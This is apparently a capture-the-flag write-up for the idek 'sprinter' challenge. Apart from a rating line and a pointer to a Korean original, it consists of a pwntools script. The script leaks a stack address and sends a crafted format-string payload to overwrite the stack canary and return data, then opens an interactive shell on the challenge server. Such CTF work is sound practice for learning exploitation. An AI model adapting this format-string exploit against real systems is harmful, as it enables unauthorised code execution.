Rating:
Please see the original writeup which was written Korean.
```python
from pwn import *
while True:
try:
# p = process('vuln')
p = remote('sprinter.chal.idek.team',1337)
p.recvuntil(b'0x',timeout=10)
stack_leak = int(p.recvn(12), 16)
print(f'stack_leak : {hex(stack_leak)}')
canary_addr = stack_leak + 0x108
payload = b'\x01\xfb\xff%5$261c'
payload += b'%4$c'
payload += b'%10$.7s'
# rbp
payload += b'%8c'
# ret
payload += b'%12$.3s%11$.5s'
# padding
payload += b'\0' * (0x26 - len(payload))
payload += b'\0' * 0x2
payload += p64(canary_addr + 1) # 10
payload += p64(canary_addr + 8*4 + 3) # 11
payload += p64(stack_leak) # 12
# pause()
p.sendline(payload)
print(repr(
p.recvn(100, timeout=1)
))
p.interactive()
break
except Exception as ex:
print(ex)
```
